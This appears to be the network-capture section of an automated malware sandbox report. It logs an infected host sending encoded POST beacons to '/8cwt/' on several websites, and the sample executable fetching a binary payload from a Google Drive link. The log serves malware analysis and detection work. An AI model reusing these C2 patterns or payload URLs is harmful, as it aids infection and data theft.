                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      58 | 192.168.11.30 | 49907 | 66.81.203.196 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:22:27.191332102 CEST | 707 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=47y8yc2UpsMBVvmAjvScewI6ndyc2BJByfn0U56sJNZR8mlo5LPmBRgDGBCzra79lz59O7VI8bskWorCLt/HeJ8mdRg2RPqTN4eo5bDGLxNP0+9jA5U1uYGQxYTf4p37quIElyuqOEi5iWPT5Ro4+HJdfE+O9mG1mtKFT07JA4UE2sY1jLYkxfALJn/xV5C1aw==
                                      Jun 4, 2024 14:22:27.353035927 CEST | 380 | IN | HTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:22:27 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      59 | 192.168.11.30 | 49908 | 66.81.203.196 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:22:29.873224974 CEST | 727 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=47y8yc2UpsMBUMuAl8KcYQI56tycjxIIyf70U5SCI/tR8HVo6J3mCRgDOhC6h67ylz0AO/dI8YQkWtvCKenEMp8ebRgwcvqTN4eo5fj8Ly9P0tljAc42woGPnITf8p3gquJRlwaQOAS5iX/T6EEn0HJESk/kyEqwsp66eSjAKNM6z7pv+Ismi/8mVmSZX7DuH/7MBBy8BSclwkBfAjqJAsg=
                                      Jun 4, 2024 14:22:30.031626940 CEST | 380 | IN | HTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:22:29 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      60 | 192.168.11.30 | 49909 | 66.81.203.196 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:22:32.565224886 CEST | 1644 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:22:32.728575945 CEST | 380 | IN | HTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:22:32 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      61 | 192.168.11.30 | 49910 | 66.81.203.196 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:22:35.246881962 CEST | 434 | OUT | GET /8cwt/?24eluX=15acxp6jrOd/buvS9YLoVCwQt/eIj0wV8tP3YL3PMsIjyFVitYjgFC8LDxGQh6T0kTJLIrMUzadAXsDAGdfiNfgPYx4xbqKJILHq2u+5CghFrM1CdZcxiKw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:22:35.405052900 CEST | 721 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:22:35 GMT
                                      Content-Type: text/html
                                      Content-Length: 571
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      62 | 192.168.11.30 | 49911 | 162.43.104.164 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:22:40.716788054 CEST | 701 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=o8ate1q6Mqoo+gzYK7+Srf6Mcc7u8Bzcu+Qts1HGWQcOPS69tGDh/4LnbIk+D3Rb6K8ysKVdNjKJvOkrZOVit6Wpp0lIana6Z8FRs6ckg/RhkColCgXxtIpLOE/D8gVngKYvnmBuRiqe+G9wsiX5EGS3Oi9ziFBJPce5RXGN73kjXvca7wnNcr6y//JG5nTXmg==
                                      Jun 4, 2024 14:22:41.019733906 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:22:39 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Jun 4, 2024 14:22:41.019752979 CEST | 300 | IN | (response body continued)


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      63 | 192.168.11.30 | 49912 | 162.43.104.164 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:22:43.518687010 CEST | 721 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=o8ate1q6Mqoo8BjYPbCSt/6PZc7uyhzAu/sts3rWWj4OPwi9/Cfh+4LnUok7MXRU6KxRsLFdNg2JvP4rZ4d9tqWrgUlKena6Z8FRs6IOg/Zh4iYlCELugopIeU/D4gVjgKZfnlFXRgSe+C5wswv2d2SxEC8bh24NEdmpQ32O/nUHbYtAmzTPPLGfj+ku7lSM7ldbbSenzX9neh3WrJsqA5E=
                                      Jun 4, 2024 14:22:43.795527935 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:22:42 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Jun 4, 2024 14:22:43.795547009 CEST | 300 | IN | (response body continued)


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      64 | 192.168.11.30 | 49913 | 162.43.104.164 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:22:46.956729889 CEST | 1638 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:22:47.265578985 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:22:45 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip


                                      Session ID  Source IP      Source Port  Destination IP  Destination Port
                                      65          192.168.11.30  49914        162.43.104.164  80
                                      Timestamp                            Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:22:49.764624119 CEST  432                OUT        GET /8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:22:50.039150953 CEST  1289               IN         HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:22:48 GMT
                                      Content-Type: text/html
                                      Content-Length: 2814
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: "afe-6014d9a904f4f"
                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; [TRUNCATED]


                                      Session ID  Source IP      Source Port  Destination IP  Destination Port
                                      66          192.168.11.30  49915        93.125.99.134   80
                                      Timestamp                            Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:23:03.499651909 CEST  680                OUT        POST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRR3y7X8ULSUT9CEBnt3yVfpN5faKaBhjGmNqxlug5rrCUZGL3WLonu4ELOb6bShhIadWLrRP+anV7LP2q+XJilLxSq0eAkc69HxBacH7rkqTDHUhcioZ4kGUP1nYWrI+XjvaQF0tmdT5jnPG09+cNrFKT4EBXbCWvNqhHyikkeqd6Zafq7uWB7g==
                                      Jun 4, 2024 14:23:04.067943096 CEST  1289               IN         HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:23:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed


                                      Session ID  Source IP      Source Port  Destination IP  Destination Port
                                      67          192.168.11.30  49916        93.125.99.134   80
                                      Timestamp                            Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:23:06.288086891 CEST  700                OUT        POST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRSWC7Y7gLV0TybEBnkXyZfpB5fbeKAT3GlvCxkqM5mLCUTmL2I7osu4YtObGbSh1IaZeLrin9AXV5S/2o9nJilLxSq3jrkdS9HAxaeiHouKTEAUhcpIZ0kGVq1jB7rK2XjrSQClthTj5lqvH06tkCzmKV+F1aZzSaBdQdvhQmNKhXFbyC5sXamk6B800T9pre06TRJq1bpZs=
                                      Jun 4, 2024 14:23:06.860879898 CEST  1289               IN         HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:23:06 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed


                                      Session ID  Source IP      Source Port  Destination IP  Destination Port
                                      68          192.168.11.30  49917        93.125.99.134   80
                                      Timestamp                            Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:23:09.061326981 CEST  1617               OUT        POST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX= [TRUNCATED]
                                      Jun 4, 2024 14:23:09.707195044 CEST  1289               IN         HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:23:09 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed
                                      Jun 4, 2024 14:23:09.707652092 CEST1289INData Raw: 53 71 eb 63 bd 57 76 63 5b c4 6b b8 58 e3 64 a3 95 1b cf 05 8c 42 02 b8 fb 1f 53 c9 4c d4 84 f8 f3 08 21 e2 07 74 66 14 42 ac 8f 4c 04 d7 c4 86 db 9c 4a 37 1f 1c 28 1c ce 79 0d df 0a 3c 28 99 b4 37 3a b9 08 4a b4 ab 08 73 03 ae dc 5e cb 6c 8c 92
                                      Data Ascii: SqcWvc[kXdBSL!tfBLJ7(y<(7:Js^lbnO<,`Zx(L\*"qa/eKdy_Jg#X-d*XoW"`Z@S4WS`.j'?1[j"k*<W:loCSJ%p.[KG
                                      Jun 4, 2024 14:23:09.707655907 CEST1289INData Raw: ba 04 8e 54 ec 6e b8 05 25 9c 4d e4 25 b8 cf 8b 76 52 b9 88 4d 86 81 92 f4 49 e4 e2 80 7c 88 53 5c 45 d7 88 85 f2 43 99 23 ee e9 c2 b2 ac 66 90 26 47 7d f4 12 1d c1 17 f4 0a 2d 51 6d 90 3f fa 95 cd 54 80 2b 1f 9e f0 8e 66 36 18 ce a8 c1 bd 2a b5
                                      Data Ascii: Tn%M%vRMI|S\EC#f&G}-Qm?T+f6*9NPJIxF1{`"xFgSi1<Z.ZVmiH5t~T1^hWuMB]vumkt@?%EfLKQH'}ck3LGnSh}x
                                      Jun 4, 2024 14:23:09.707665920 CEST860INData Raw: 64 5c 83 70 10 0c 5c 73 a2 e9 1a 7b fb 0f 5a df d1 35 61 cd 8e 0a 69 32 c0 96 d6 d7 e6 f8 52 63 ac 15 6f f8 66 4b 4c 71 2d 96 5c a6 09 7e b8 f6 f3 d1 ac b2 89 b3 8f b3 72 ab 72 bc 37 2f ba 20 12 6b bc e0 69 3b 79 c1 2c 3f 58 c4 b1 57 5f 37 d8 c0
                                      Data Ascii: d\p\s{Z5ai2RcofKLq-\~rr7/ ki;y,?XW_77Xesxrw~-^rr[jcmH#T.an|v{#x^d\iQ9\lN"7+/1Y1=;DtC|: ,IB_A)<fz


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      69 | 192.168.11.30 | 49918 | 93.125.99.134 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:23:11.841664076 CEST | 425 | OUT | GET /8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:23:12.088104010 CEST | 548 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Tue, 04 Jun 2024 12:23:11 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 0
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      x-redirect-by: WordPress
                                      location: http://brongal.by/8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6
                                      x-litespeed-cache: hit
                                      x-turbo-charged-by: LiteSpeed
                                      Server: LiteSpeed


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      70 | 192.168.11.30 | 49919 | 34.232.203.70 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:23:17.243041039 CEST | 674 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=xdHu5fC/8uEzGBvc06KZLLWt7Iu6rYZanLManAWP4M2fCEvnTxC4cD7fSHbv/FPYLKTOQO6XmZX9AlEgbiibzwW4WIl5uU0R+KHJvVu1XCvwkYfOsiSyBeSLJzNk85s9IY8CDEoAT8pntI1HK6Qb2M5+H7tUf4nK9rk1az6658AT9gPqjVc2y/8rMtju/DkmJQ==
                                      Jun 4, 2024 14:23:17.376660109 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:23:17 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      71 | 192.168.11.30 | 49920 | 34.232.203.70 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:23:19.898196936 CEST | 694 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=xdHu5fC/8uEzHh/c2bKZJrWq0ou6k4YRnKwanA+l4+ifDmnnS1u4Sj7fL3bgh1PfLKPsQPGXmf79Ak0gbRaYzgW6eol3qU0R+KHJvVKPXCHwnovOuHmxCeSMIzNkvpsHIY8gDF06T6tntK9HELQYls58LrsbX5ac+aUCVRa9wu02xX+w+Wo0hfAGQsOG9Bl9UbtPoupztkpvZ6+ASB2vJKQ=
                                      Jun 4, 2024 14:23:20.031656027 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:23:19 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.11.30 | 49842 | 142.250.217.174 | 443 | 3344 | C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-06-04 12:14:44 UTC | 216 | OUT | GET /uc?export=download&id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2024-06-04 12:14:45 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 04 Jun 2024 12:14:44 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: script-src 'nonce-YeRv5Plf8HFHjGMuZHFaCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.11.30 | 49843 | 172.217.215.132 | 443 | 3344 | C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-06-04 12:14:45 UTC | 258 | OUT | GET /download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-06-04 12:14:46 UTC | 4802 | IN | HTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="yWAFO148.bin"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
